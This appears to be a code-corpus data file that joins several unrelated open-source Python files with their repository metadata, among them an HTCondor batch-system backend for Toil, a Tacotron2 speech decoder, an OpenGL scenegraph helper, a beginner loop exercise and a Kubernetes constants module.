absolutelimits['min_ttl']) self.assertEqual(cfg.CONF['service:central'].max_zone_name_len, absolutelimits['max_zone_name_length']) self.assertEqual(cfg.CONF['service:central'].max_recordset_name_len, absolutelimits['max_recordset_name_length']) self.assertEqual(cfg.CONF['service:api'].max_limit_v2, absolutelimits['max_page_limit'])
2.140625
2
pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGLContext/scenegraph/nodepath.py
alexus37/AugmentedRealityChess
1
5521
"""node-path implementation for OpenGLContext """ from vrml.vrml97 import nodepath, nodetypes from vrml.cache import CACHE from OpenGLContext import quaternion from OpenGL.GL import glMultMatrixf class _NodePath( object ): """OpenGLContext-specific node-path class At the moment this only adds a single method, transform() which traverses the path, calling transform() for each Transforming node which has a transform method. """ __slots__ = () def transform( self, mode=None, translate=1, scale=1, rotate=1 ): """For each Transforming node, do OpenGL transform Does _not_ push-pop matrices, so do that before if you want to save your current matrix. This method is useful primarily for storing paths to, for instance, bindable nodes, where you want to be able to rapidly transform down to the node, without needing a full traversal of the scenegraph. """ matrix = self.transformMatrix( translate=translate, scale=scale, rotate=rotate ) glMultMatrixf( matrix ) def quaternion( self ): """Get summary quaternion for all rotations in stack""" nodes = [ node for node in self if ( isinstance(node, nodetypes.Transforming) and hasattr( node, "orientation") ) ] q = quaternion.Quaternion() for node in nodes: q = q * quaternion.fromXYZR( *node.orientation ) return q class NodePath( _NodePath, nodepath.NodePath ): pass class WeakNodePath( _NodePath, nodepath.WeakNodePath ): pass
2.640625
3
part01_basic/for_while_loop.py
ApprenticeOne/python_learn
0
5522
import random from math import sqrt sum = 0 for x in range(101): sum += x print(sum) ''' range(101) 0-100 一共101个数 range(1,101) 1-100 range(1,101,2) 1-100间的奇数 步长为2 range(100,0,-2) 100-0间的偶数 步长为-2 ''' sum = 0 for x in range(100, 0, -2): sum += x print(sum) # while # 0-100间的随机数 answer = random.randint(0, 100) count = 0 while True: count += 1 number = int(input("Please enter the number: ")) if number < answer: print("more larger") elif number > answer: print("more smaller") else: print("right") print('you got d% times to get right answer' % count) for i in range(1, 10): for j in range(1, i + 1): print('%d*%d=%d' % (i, j, i * j), end='\t') print() # 输入一个正整数判断是不是素数 num = int(input('请输入一个正整数: ')) end = int(sqrt(num)) is_prime = True # 为什么要放一个end 如果这个数有一个小于sqrt的因数 # 就一定会有一个大于sqrt的因数与之对应 for x in range(2, end + 1): if num % x == 0: is_prime = False break if is_prime and num != 1: print('%d是素数' % num) else: print('%d不是素数' % num)
3.78125
4
src/toil/batchSystems/htcondor.py
ElementGenomicsInc/toil
2
5523
<filename>src/toil/batchSystems/htcondor.py # Copyright (C) 2018, HTCondor Team, Computer Sciences Department, # University of Wisconsin-Madison, WI. # # Licensed under the Apache License, Version 2.0 (the "License"); you # may not use this file except in compliance with the License. You may # obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import from builtins import str import sys import os import logging import time import math from toil.batchSystems.abstractGridEngineBatchSystem import AbstractGridEngineBatchSystem import htcondor import classad logger = logging.getLogger(__name__) class HTCondorBatchSystem(AbstractGridEngineBatchSystem): # When using HTCondor, the Schedd handles scheduling class Worker(AbstractGridEngineBatchSystem.Worker): # Override the createJobs method so that we can use htcondor.Submit objects # and so that we can get disk allocation requests and ceil the CPU request. def createJobs(self, newJob): activity = False if newJob is not None: self.waitingJobs.append(newJob) # Queue jobs as necessary: while len(self.waitingJobs) > 0: activity = True jobID, cpu, memory, disk, jobName, command = self.waitingJobs.pop(0) # Prepare the htcondor.Submit object submitObj = self.prepareSubmission(cpu, memory, disk, jobID, jobName, command) logger.debug("Submitting %r", submitObj) # Submit job and get batch system ID (i.e. the ClusterId) batchJobID = self.submitJob(submitObj) logger.debug("Submitted job %s", str(batchJobID)) # Store dict for mapping Toil job ID to batch job ID # TODO: Note that this currently stores a tuple of (batch system # ID, Task), but the second value is None by default and doesn't # seem to be used self.batchJobIDs[jobID] = (batchJobID, None) # Add to queue of queued ("running") jobs self.runningJobs.add(jobID) # Add to allocated resources self.allocatedCpus[jobID] = int(math.ceil(cpu)) return activity def prepareSubmission(self, cpu, memory, disk, jobID, jobName, command): # Convert resource requests cpu = int(math.ceil(cpu)) # integer CPUs memory = float(memory)/1024 # memory in KB disk = float(disk)/1024 # disk in KB # Workaround for HTCondor Python bindings Unicode conversion bug command = command.encode('utf-8') # Execute the entire command as /bin/sh -c "command" # TODO: Transfer the jobStore directory if using a local file store with a relative path. submit_parameters = { 'executable': '/bin/sh', 'transfer_executable': 'False', 'arguments': '''"-c '{0}'"'''.format(command), 'environment': self.getEnvString(), 'request_cpus': '{0}'.format(cpu), 'request_memory': '{0:.3f}KB'.format(memory), 'request_disk': '{0:.3f}KB'.format(disk), 'leave_in_queue': '(JobStatus == 4)', '+IsToilJob': 'True', '+ToilJobID': '{0}'.format(jobID), '+ToilJobName': '"{0}"'.format(jobName), '+ToilJobKilled': 'False', } # Return the Submit object return htcondor.Submit(submit_parameters) def submitJob(self, submitObj): # Queue the job using a Schedd transaction schedd = self.connectSchedd() with schedd.transaction() as txn: batchJobID = submitObj.queue(txn) # Return the ClusterId return batchJobID def getRunningJobIDs(self): # Get all Toil jobs that are running requirements = '(JobStatus == 2) && (IsToilJob)' projection = ['ClusterId', 'ToilJobID', 'EnteredCurrentStatus'] schedd = self.connectSchedd() ads = schedd.xquery(requirements = requirements, projection = projection) # Only consider the Toil jobs that are part of this workflow batchJobIDs = [batchJobID for (batchJobID, task) in self.batchJobIDs.values()] job_runtimes = {} for ad in ads: batchJobID = int(ad['ClusterId']) jobID = int(ad['ToilJobID']) if not (batchJobID in batchJobIDs): continue # HTCondor stores the start of the runtime as a Unix timestamp runtime = time.time() - ad['EnteredCurrentStatus'] job_runtimes[jobID] = runtime return job_runtimes def killJob(self, jobID): batchJobID = self.batchJobIDs[jobID][0] logger.debug("Killing HTCondor job {0}".format(batchJobID)) # Set the job to be killed when its exit status is checked schedd = self.connectSchedd() job_spec = '(ClusterId == {0})'.format(batchJobID) schedd.edit(job_spec, 'ToilJobKilled', 'True') def getJobExitCode(self, batchJobID): logger.debug("Getting exit code for HTCondor job {0}".format(batchJobID)) status = { 1: 'Idle', 2: 'Running', 3: 'Removed', 4: 'Completed', 5: 'Held', 6: 'Transferring Output', 7: 'Suspended' } requirements = '(ClusterId == {0})'.format(batchJobID) projection = ['JobStatus', 'ToilJobKilled', 'ExitCode', 'HoldReason', 'HoldReasonSubCode'] schedd = self.connectSchedd() ads = schedd.xquery(requirements = requirements, projection = projection) # Make sure a ClassAd was returned try: ad = ads.next() except StopIteration: logger.error( "No HTCondor ads returned using constraint: {0}".format(requirements)) raise # Make sure only one ClassAd was returned try: ads.next() except StopIteration: pass else: logger.warning( "Multiple HTCondor ads returned using constraint: {0}".format(requirements)) if ad['ToilJobKilled']: logger.debug("HTCondor job {0} was killed by Toil".format(batchJobID)) # Remove the job from the Schedd and return 1 job_spec = 'ClusterId == {0}'.format(batchJobID) schedd.act(htcondor.JobAction.Remove, job_spec) return 1 elif status[ad['JobStatus']] == 'Completed': logger.debug("HTCondor job {0} completed with exit code {1}".format( batchJobID, ad['ExitCode'])) # Remove the job from the Schedd and return its exit code job_spec = 'ClusterId == {0}'.format(batchJobID) schedd.act(htcondor.JobAction.Remove, job_spec) return int(ad['ExitCode']) elif status[ad['JobStatus']] == 'Held': logger.error("HTCondor job {0} was held: '{1} (sub code {2})'".format( batchJobID, ad['HoldReason'], ad['HoldReasonSubCode'])) # Remove the job from the Schedd and return 1 job_spec = 'ClusterId == {0}'.format(batchJobID) schedd.act(htcondor.JobAction.Remove, job_spec) return 1 else: # Job still running or idle or doing something else logger.debug("HTCondor job {0} has not completed (Status: {1})".format( batchJobID, status[ad['JobStatus']])) return None """ Implementation-specific helper methods """ def connectSchedd(self): '''Connect to HTCondor Schedd and return a Schedd object''' condor_host = os.getenv('TOIL_HTCONDOR_COLLECTOR') schedd_name = os.getenv('TOIL_HTCONDOR_SCHEDD') # If TOIL_HTCONDOR_ variables are set, use them to find the Schedd if condor_host and schedd_name: logger.debug( "Connecting to HTCondor Schedd {0} using Collector at {1}".format( schedd_name, condor_host)) try: schedd_ad = htcondor.Collector(condor_host).locate( htcondor.DaemonTypes.Schedd, schedd_name) except IOError: logger.error( "Could not connect to HTCondor Collector at {0}".format(condor_host)) raise except ValueError: logger.error( "Could not find HTCondor Schedd with name {0}".format(schedd_name)) raise else: schedd = htcondor.Schedd(schedd_ad) # Otherwise assume the Schedd is on the local machine else: logger.debug("Connecting to HTCondor Schedd on local machine") schedd = htcondor.Schedd() # Ping the Schedd to make sure it's there and responding try: schedd.xquery(limit = 0) except RuntimeError: logger.error("Could not connect to HTCondor Schedd") raise return schedd def getEnvString(self): '''Build an environment string that a HTCondor Submit object can use. For examples of valid strings, see: http://research.cs.wisc.edu/htcondor/manual/current/condor_submit.html#man-condor-submit-environment ''' env_items = [] if self.boss.environment: for key, value in self.boss.environment.items(): # Each variable should be in the form of <key>='<value>' env_string = key + "=" # The entire value should be encapsulated in single quotes # Quote marks (single or double) that are part of the value should be duplicated env_string += "'" + value.replace("'", "''").replace('"', '""') + "'" env_items.append(env_string) # The entire string should be encapsulated in double quotes # Each variable should be separated by a single space return '"' + ' '.join(env_items) + '"' # Override the issueBatchJob method so HTCondor can be given the disk request def issueBatchJob(self, jobNode): # Avoid submitting internal jobs to the batch queue, handle locally localID = self.handleLocalJob(jobNode) if localID: return localID else: self.checkResourceRequest(jobNode.memory, jobNode.cores, jobNode.disk) jobID = self.getNextJobID() self.currentJobs.add(jobID) # Add the jobNode.disk and jobNode.jobName to the job tuple self.newJobsQueue.put((jobID, jobNode.cores, jobNode.memory, jobNode.disk, jobNode.jobName, jobNode.command)) logger.debug("Issued the job command: %s with job id: %s ", jobNode.command, str(jobID)) return jobID @classmethod def obtainSystemConstants(cls): # Since it's not always clear what the max cpus and max memory available # in an HTCondor slot might be, use some reasonable constants for now. # TODO: Use a htcondor.Collector().query() to determine reasonable values. max_cpu = 4 max_mem = 4e9 return max_cpu, max_mem
2.140625
2
paddlespeech/t2s/modules/tacotron2/decoder.py
alanlv/PaddleSpeech
0
5524
<gh_stars>0 # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Modified from espnet(https://github.com/espnet/espnet) """Tacotron2 decoder related modules.""" import paddle import paddle.nn.functional as F import six from paddle import nn from paddlespeech.t2s.modules.tacotron2.attentions import AttForwardTA class Prenet(nn.Layer): """Prenet module for decoder of Spectrogram prediction network. This is a module of Prenet in the decoder of Spectrogram prediction network, which described in `Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`_. The Prenet preforms nonlinear conversion of inputs before input to auto-regressive lstm, which helps to learn diagonal attentions. Notes ---------- This module alway applies dropout even in evaluation. See the detail in `Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`_. .. _`Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`: https://arxiv.org/abs/1712.05884 """ def __init__(self, idim, n_layers=2, n_units=256, dropout_rate=0.5): """Initialize prenet module. Parameters ---------- idim : int Dimension of the inputs. odim : int Dimension of the outputs. n_layers : int, optional The number of prenet layers. n_units : int, optional The number of prenet units. """ super().__init__() self.dropout_rate = dropout_rate self.prenet = nn.LayerList() for layer in six.moves.range(n_layers): n_inputs = idim if layer == 0 else n_units self.prenet.append( nn.Sequential(nn.Linear(n_inputs, n_units), nn.ReLU())) def forward(self, x): """Calculate forward propagation. Parameters ---------- x : Tensor Batch of input tensors (B, ..., idim). Returns ---------- Tensor Batch of output tensors (B, ..., odim). """ for i in six.moves.range(len(self.prenet)): # F.dropout 引入了随机, tacotron2 的 dropout 是不能去掉的 x = F.dropout(self.prenet[i](x)) return x class Postnet(nn.Layer): """Postnet module for Spectrogram prediction network. This is a module of Postnet in Spectrogram prediction network, which described in `Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`_. The Postnet predicts refines the predicted Mel-filterbank of the decoder, which helps to compensate the detail sturcture of spectrogram. .. _`Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`: https://arxiv.org/abs/1712.05884 """ def __init__( self, idim, odim, n_layers=5, n_chans=512, n_filts=5, dropout_rate=0.5, use_batch_norm=True, ): """Initialize postnet module. Parameters ---------- idim : int Dimension of the inputs. odim : int Dimension of the outputs. n_layers : int, optional The number of layers. n_filts : int, optional The number of filter size. n_units : int, optional The number of filter channels. use_batch_norm : bool, optional Whether to use batch normalization.. dropout_rate : float, optional Dropout rate.. """ super().__init__() self.postnet = nn.LayerList() for layer in six.moves.range(n_layers - 1): ichans = odim if layer == 0 else n_chans ochans = odim if layer == n_layers - 1 else n_chans if use_batch_norm: self.postnet.append( nn.Sequential( nn.Conv1D( ichans, ochans, n_filts, stride=1, padding=(n_filts - 1) // 2, bias_attr=False, ), nn.BatchNorm1D(ochans), nn.Tanh(), nn.Dropout(dropout_rate), )) else: self.postnet.append( nn.Sequential( nn.Conv1D( ichans, ochans, n_filts, stride=1, padding=(n_filts - 1) // 2, bias_attr=False, ), nn.Tanh(), nn.Dropout(dropout_rate), )) ichans = n_chans if n_layers != 1 else odim if use_batch_norm: self.postnet.append( nn.Sequential( nn.Conv1D( ichans, odim, n_filts, stride=1, padding=(n_filts - 1) // 2, bias_attr=False, ), nn.BatchNorm1D(odim), nn.Dropout(dropout_rate), )) else: self.postnet.append( nn.Sequential( nn.Conv1D( ichans, odim, n_filts, stride=1, padding=(n_filts - 1) // 2, bias_attr=False, ), nn.Dropout(dropout_rate), )) def forward(self, xs): """Calculate forward propagation. Parameters ---------- xs : Tensor Batch of the sequences of padded input tensors (B, idim, Tmax). Returns ---------- Tensor Batch of padded output tensor. (B, odim, Tmax). """ for i in six.moves.range(len(self.postnet)): xs = self.postnet[i](xs) return xs class ZoneOutCell(nn.Layer): """ZoneOut Cell module. This is a module of zoneout described in `Zoneout: Regularizing RNNs by Randomly Preserving Hidden Activations`_. This code is modified from `eladhoffer/seq2seq.pytorch`_. Examples ---------- >>> lstm = paddle.nn.LSTMCell(16, 32) >>> lstm = ZoneOutCell(lstm, 0.5) .. _`Zoneout: Regularizing RNNs by Randomly Preserving Hidden Activations`: https://arxiv.org/abs/1606.01305 .. _`eladhoffer/seq2seq.pytorch`: https://github.com/eladhoffer/seq2seq.pytorch """ def __init__(self, cell, zoneout_rate=0.1): """Initialize zone out cell module. Parameters ---------- cell : nn.Layer: Paddle recurrent cell module e.g. `paddle.nn.LSTMCell`. zoneout_rate : float, optional Probability of zoneout from 0.0 to 1.0. """ super().__init__() self.cell = cell self.hidden_size = cell.hidden_size self.zoneout_rate = zoneout_rate if zoneout_rate > 1.0 or zoneout_rate < 0.0: raise ValueError( "zoneout probability must be in the range from 0.0 to 1.0.") def forward(self, inputs, hidden): """Calculate forward propagation. Parameters ---------- inputs : Tensor Batch of input tensor (B, input_size). hidden : tuple - Tensor: Batch of initial hidden states (B, hidden_size). - Tensor: Batch of initial cell states (B, hidden_size). Returns ---------- Tensor Batch of next hidden states (B, hidden_size). tuple: - Tensor: Batch of next hidden states (B, hidden_size). - Tensor: Batch of next cell states (B, hidden_size). """ # we only use the second output of LSTMCell in paddle _, next_hidden = self.cell(inputs, hidden) next_hidden = self._zoneout(hidden, next_hidden, self.zoneout_rate) # to have the same output format with LSTMCell in paddle return next_hidden[0], next_hidden def _zoneout(self, h, next_h, prob): # apply recursively if isinstance(h, tuple): num_h = len(h) if not isinstance(prob, tuple): prob = tuple([prob] * num_h) return tuple( [self._zoneout(h[i], next_h[i], prob[i]) for i in range(num_h)]) if self.training: mask = paddle.bernoulli(paddle.ones([*paddle.shape(h)]) * prob) return mask * h + (1 - mask) * next_h else: return prob * h + (1 - prob) * next_h class Decoder(nn.Layer): """Decoder module of Spectrogram prediction network. This is a module of decoder of Spectrogram prediction network in Tacotron2, which described in `Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`_. The decoder generates the sequence of features from the sequence of the hidden states. .. _`Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`: https://arxiv.org/abs/1712.05884 """ def __init__( self, idim, odim, att, dlayers=2, dunits=1024, prenet_layers=2, prenet_units=256, postnet_layers=5, postnet_chans=512, postnet_filts=5, output_activation_fn=None, cumulate_att_w=True, use_batch_norm=True, use_concate=True, dropout_rate=0.5, zoneout_rate=0.1, reduction_factor=1, ): """Initialize Tacotron2 decoder module. Parameters ---------- idim : int Dimension of the inputs. odim : int Dimension of the outputs. att nn.Layer Instance of attention class. dlayers int, optional The number of decoder lstm layers. dunits : int, optional The number of decoder lstm units. prenet_layers : int, optional The number of prenet layers. prenet_units : int, optional The number of prenet units. postnet_layers : int, optional The number of postnet layers. postnet_filts : int, optional The number of postnet filter size. postnet_chans : int, optional The number of postnet filter channels. output_activation_fn : nn.Layer, optional Activation function for outputs. cumulate_att_w : bool, optional Whether to cumulate previous attention weight. use_batch_norm : bool, optional Whether to use batch normalization. use_concate : bool, optional Whether to concatenate encoder embedding with decoder lstm outputs. dropout_rate : float, optional Dropout rate. zoneout_rate : float, optional Zoneout rate. reduction_factor : int, optional Reduction factor. """ super().__init__() # store the hyperparameters self.idim = idim self.odim = odim self.att = att self.output_activation_fn = output_activation_fn self.cumulate_att_w = cumulate_att_w self.use_concate = use_concate self.reduction_factor = reduction_factor # check attention type if isinstance(self.att, AttForwardTA): self.use_att_extra_inputs = True else: self.use_att_extra_inputs = False # define lstm network prenet_units = prenet_units if prenet_layers != 0 else odim self.lstm = nn.LayerList() for layer in six.moves.range(dlayers): iunits = idim + prenet_units if layer == 0 else dunits lstm = nn.LSTMCell(iunits, dunits) if zoneout_rate > 0.0: lstm = ZoneOutCell(lstm, zoneout_rate) self.lstm.append(lstm) # define prenet if prenet_layers > 0: self.prenet = Prenet( idim=odim, n_layers=prenet_layers, n_units=prenet_units, dropout_rate=dropout_rate, ) else: self.prenet = None # define postnet if postnet_layers > 0: self.postnet = Postnet( idim=idim, odim=odim, n_layers=postnet_layers, n_chans=postnet_chans, n_filts=postnet_filts, use_batch_norm=use_batch_norm, dropout_rate=dropout_rate, ) else: self.postnet = None # define projection layers iunits = idim + dunits if use_concate else dunits self.feat_out = nn.Linear( iunits, odim * reduction_factor, bias_attr=False) self.prob_out = nn.Linear(iunits, reduction_factor) # initialize # self.apply(decoder_init) def _zero_state(self, hs): init_hs = paddle.zeros([paddle.shape(hs)[0], self.lstm[0].hidden_size]) return init_hs def forward(self, hs, hlens, ys): """Calculate forward propagation. Parameters ---------- hs : Tensor Batch of the sequences of padded hidden states (B, Tmax, idim). hlens : Tensor(int64) padded Batch of lengths of each input batch (B,). ys : Tensor Batch of the sequences of padded target features (B, Lmax, odim). Returns ---------- Tensor Batch of output tensors after postnet (B, Lmax, odim). Tensor Batch of output tensors before postnet (B, Lmax, odim). Tensor Batch of logits of stop prediction (B, Lmax). Tensor Batch of attention weights (B, Lmax, Tmax). Note ---------- This computation is performed in teacher-forcing manner. """ # thin out frames (B, Lmax, odim) -> (B, Lmax/r, odim) if self.reduction_factor > 1: ys = ys[:, self.reduction_factor - 1::self.reduction_factor] # length list should be list of int # hlens = list(map(int, hlens)) # initialize hidden states of decoder c_list = [self._zero_state(hs)] z_list = [self._zero_state(hs)] for _ in six.moves.range(1, len(self.lstm)): c_list += [self._zero_state(hs)] z_list += [self._zero_state(hs)] prev_out = paddle.zeros([paddle.shape(hs)[0], self.odim]) # initialize attention prev_att_w = None self.att.reset() # loop for an output sequence outs, logits, att_ws = [], [], [] for y in ys.transpose([1, 0, 2]): if self.use_att_extra_inputs: att_c, att_w = self.att(hs, hlens, z_list[0], prev_att_w, prev_out) else: att_c, att_w = self.att(hs, hlens, z_list[0], prev_att_w) prenet_out = self.prenet( prev_out) if self.prenet is not None else prev_out xs = paddle.concat([att_c, prenet_out], axis=1) # we only use the second output of LSTMCell in paddle _, next_hidden = self.lstm[0](xs, (z_list[0], c_list[0])) z_list[0], c_list[0] = next_hidden for i in six.moves.range(1, len(self.lstm)): # we only use the second output of LSTMCell in paddle _, next_hidden = self.lstm[i](z_list[i - 1], (z_list[i], c_list[i])) z_list[i], c_list[i] = next_hidden zcs = (paddle.concat([z_list[-1], att_c], axis=1) if self.use_concate else z_list[-1]) outs += [ self.feat_out(zcs).reshape([paddle.shape(hs)[0], self.odim, -1]) ] logits += [self.prob_out(zcs)] att_ws += [att_w] # teacher forcing prev_out = y if self.cumulate_att_w and prev_att_w is not None: prev_att_w = prev_att_w + att_w # Note: error when use += else: prev_att_w = att_w # (B, Lmax) logits = paddle.concat(logits, axis=1) # (B, odim, Lmax) before_outs = paddle.concat(outs, axis=2) # (B, Lmax, Tmax) att_ws = paddle.stack(att_ws, axis=1) if self.reduction_factor > 1: # (B, odim, Lmax) before_outs = before_outs.reshape( [paddle.shape(before_outs)[0], self.odim, -1]) if self.postnet is not None: # (B, odim, Lmax) after_outs = before_outs + self.postnet(before_outs) else: after_outs = before_outs # (B, Lmax, odim) before_outs = before_outs.transpose([0, 2, 1]) # (B, Lmax, odim) after_outs = after_outs.transpose([0, 2, 1]) logits = logits # apply activation function for scaling if self.output_activation_fn is not None: before_outs = self.output_activation_fn(before_outs) after_outs = self.output_activation_fn(after_outs) return after_outs, before_outs, logits, att_ws def inference( self, h, threshold=0.5, minlenratio=0.0, maxlenratio=10.0, use_att_constraint=False, backward_window=None, forward_window=None, ): """Generate the sequence of features given the sequences of characters. Parameters ---------- h : Tensor Input sequence of encoder hidden states (T, C). threshold : float, optional Threshold to stop generation. minlenratio : float, optional Minimum length ratio. If set to 1.0 and the length of input is 10, the minimum length of outputs will be 10 * 1 = 10. minlenratio : float, optional Minimum length ratio. If set to 10 and the length of input is 10, the maximum length of outputs will be 10 * 10 = 100. use_att_constraint : bool Whether to apply attention constraint introduced in `Deep Voice 3`_. backward_window : int Backward window size in attention constraint. forward_window : int Forward window size in attention constraint. Returns ---------- Tensor Output sequence of features (L, odim). Tensor Output sequence of stop probabilities (L,). Tensor Attention weights (L, T). Note ---------- This computation is performed in auto-regressive manner. .. _`Deep Voice 3`: https://arxiv.org/abs/1710.07654 """ # setup assert len(paddle.shape(h)) == 2 hs = h.unsqueeze(0) ilens = paddle.shape(h)[0] maxlen = int(paddle.shape(h)[0] * maxlenratio) minlen = int(paddle.shape(h)[0] * minlenratio) # initialize hidden states of decoder c_list = [self._zero_state(hs)] z_list = [self._zero_state(hs)] for _ in six.moves.range(1, len(self.lstm)): c_list += [self._zero_state(hs)] z_list += [self._zero_state(hs)] prev_out = paddle.zeros([1, self.odim]) # initialize attention prev_att_w = None self.att.reset() # setup for attention constraint if use_att_constraint: last_attended_idx = 0 else: last_attended_idx = None # loop for an output sequence idx = 0 outs, att_ws, probs = [], [], [] while True: # updated index idx += self.reduction_factor # decoder calculation if self.use_att_extra_inputs: att_c, att_w = self.att( hs, ilens, z_list[0], prev_att_w, prev_out, last_attended_idx=last_attended_idx, backward_window=backward_window, forward_window=forward_window, ) else: att_c, att_w = self.att( hs, ilens, z_list[0], prev_att_w, last_attended_idx=last_attended_idx, backward_window=backward_window, forward_window=forward_window, ) att_ws += [att_w] prenet_out = self.prenet( prev_out) if self.prenet is not None else prev_out xs = paddle.concat([att_c, prenet_out], axis=1) # we only use the second output of LSTMCell in paddle _, next_hidden = self.lstm[0](xs, (z_list[0], c_list[0])) z_list[0], c_list[0] = next_hidden for i in six.moves.range(1, len(self.lstm)): # we only use the second output of LSTMCell in paddle _, next_hidden = self.lstm[i](z_list[i - 1], (z_list[i], c_list[i])) z_list[i], c_list[i] = next_hidden zcs = (paddle.concat([z_list[-1], att_c], axis=1) if self.use_concate else z_list[-1]) # [(1, odim, r), ...] outs += [self.feat_out(zcs).reshape([1, self.odim, -1])] # [(r), ...] probs += [F.sigmoid(self.prob_out(zcs))[0]] if self.output_activation_fn is not None: prev_out = self.output_activation_fn( outs[-1][:, :, -1]) # (1, odim) else: prev_out = outs[-1][:, :, -1] # (1, odim) if self.cumulate_att_w and prev_att_w is not None: prev_att_w = prev_att_w + att_w # Note: error when use += else: prev_att_w = att_w if use_att_constraint: last_attended_idx = int(att_w.argmax()) # check whether to finish generation if sum(paddle.cast(probs[-1] >= threshold, 'int64')) > 0 or idx >= maxlen: # check mininum length if idx < minlen: continue # (1, odim, L) outs = paddle.concat(outs, axis=2) if self.postnet is not None: # (1, odim, L) outs = outs + self.postnet(outs) # (L, odim) outs = outs.transpose([0, 2, 1]).squeeze(0) probs = paddle.concat(probs, axis=0) att_ws = paddle.concat(att_ws, axis=0) break if self.output_activation_fn is not None: outs = self.output_activation_fn(outs) return outs, probs, att_ws def calculate_all_attentions(self, hs, hlens, ys): """Calculate all of the attention weights. Parameters ---------- hs : Tensor Batch of the sequences of padded hidden states (B, Tmax, idim). hlens : Tensor(int64) Batch of lengths of each input batch (B,). ys : Tensor Batch of the sequences of padded target features (B, Lmax, odim). Returns ---------- numpy.ndarray Batch of attention weights (B, Lmax, Tmax). Note ---------- This computation is performed in teacher-forcing manner. """ # thin out frames (B, Lmax, odim) -> (B, Lmax/r, odim) if self.reduction_factor > 1: ys = ys[:, self.reduction_factor - 1::self.reduction_factor] # length list should be list of int hlens = list(map(int, hlens)) # initialize hidden states of decoder c_list = [self._zero_state(hs)] z_list = [self._zero_state(hs)] for _ in six.moves.range(1, len(self.lstm)): c_list += [self._zero_state(hs)] z_list += [self._zero_state(hs)] prev_out = paddle.zeros([paddle.shape(hs)[0], self.odim]) # initialize attention prev_att_w = None self.att.reset() # loop for an output sequence att_ws = [] for y in ys.transpose([1, 0, 2]): if self.use_att_extra_inputs: att_c, att_w = self.att(hs, hlens, z_list[0], prev_att_w, prev_out) else: att_c, att_w = self.att(hs, hlens, z_list[0], prev_att_w) att_ws += [att_w] prenet_out = self.prenet( prev_out) if self.prenet is not None else prev_out xs = paddle.concat([att_c, prenet_out], axis=1) # we only use the second output of LSTMCell in paddle _, next_hidden = self.lstm[0](xs, (z_list[0], c_list[0])) z_list[0], c_list[0] = next_hidden for i in six.moves.range(1, len(self.lstm)): z_list[i], c_list[i] = self.lstm[i](z_list[i - 1], (z_list[i], c_list[i])) # teacher forcing prev_out = y if self.cumulate_att_w and prev_att_w is not None: # Note: error when use += prev_att_w = prev_att_w + att_w else: prev_att_w = att_w # (B, Lmax, Tmax) att_ws = paddle.stack(att_ws, axis=1) return att_ws
2.21875
2
pyblazing/__init__.py
Mattlk13/pyBlazing
0
5525
from .api import run_query_get_token from .api import convert_to_dask from .api import run_query_get_results from .api import run_query_get_concat_results from .api import register_file_system from .api import deregister_file_system from .api import FileSystemType, DriverType, EncryptionType from .api import SchemaFrom from .api import create_table from .api import ResultSetHandle from .api import _get_client from .api import gdf_dtype from .api import get_dtype_values from .api import get_np_dtype_to_gdf_dtype from .api import SetupOrchestratorConnection from .apiv2.context import make_default_orc_arg from .apiv2.context import make_default_csv_arg
1.296875
1
bootstrap/p1.5.0/src/common/const.py
apurwaj2/df-on-k8s
0
5526
class Constants(object): LOGGER_CONF = "common/mapr_conf/logger.yml" USERNAME = "mapr" GROUPNAME = "mapr" USERID = 5000 GROUPID = 5000 ADMIN_USERNAME = "custadmin" ADMIN_GROUPNAME = "custadmin" ADMIN_USERID = 7000 ADMIN_GROUPID = 7000 ADMIN_PASS = "<PASSWORD>" MYSQL_USER = "admin" MYSQL_PASS = "<PASSWORD>" LDAPADMIN_USER = "admin" LDAPADMIN_PASS = "<PASSWORD>" LDAPBIND_USER = "readonly" LDAPBIND_PASS = "<PASSWORD>" EXAMPLE_LDAP_NAMESPACE = "hpe-ldap" CSI_REPO = "quay.io/k8scsi" KDF_REPO = "docker.io/maprtech" #registry.hub.docker.com/maprtech KUBEFLOW_REPO = "gcr.io/mapr-252711/kf-ecp-5.3.0" OPERATOR_REPO = "gcr.io/mapr-252711" KUBELET_DIR = "/var/lib/kubelet" ECP_KUBELET_DIR = "/var/lib/docker/kubelet" LOCAL_PATH_PROVISIONER_REPO= "" KFCTL_HSP_ISTIO_REPO = "" BUSYBOX_REPO = "" def enum(**named_values): return type('Enum', (), named_values) AUTH_TYPES = enum(CUSTOM_LDAP='customLDAP', RAW_LINUX_USERS='rawLinuxUsers', EXAMPLE_LDAP='exampleLDAP') # OPEN SSL OPENSSL = '/usr/bin/openssl' KEY_SIZE = 1024 DAYS = 3650 CA_CERT = 'ca.cert' CA_KEY = 'ca.key' # http://www.openssl.org/docs/apps/openssl.html#PASS_PHRASE_ARGUMENTS X509_EXTRA_ARGS = () OPENSSL_CONFIG_TEMPLATE = """ prompt = no distinguished_name = req_distinguished_name req_extensions = v3_req [ req_distinguished_name ] C = US ST = CO L = Fort Collins O = HPE OU = HCP CN = %(service)s emailAddress = <EMAIL> [ v3_req ] # Extensions to add to a certificate request basicConstraints = CA:FALSE keyUsage = nonRepudiation, digitalSignature, keyEncipherment subjectAltName = @alt_names [ alt_names ] DNS.1 = %(service)s DNS.2 = %(service)s.%(namespace)s DNS.3 = %(service)s.%(namespace)s.svc """
1.929688
2
dataset/scan2cad/s2c_collect_pgroup.py
jeonghyunkeem/PointGroup
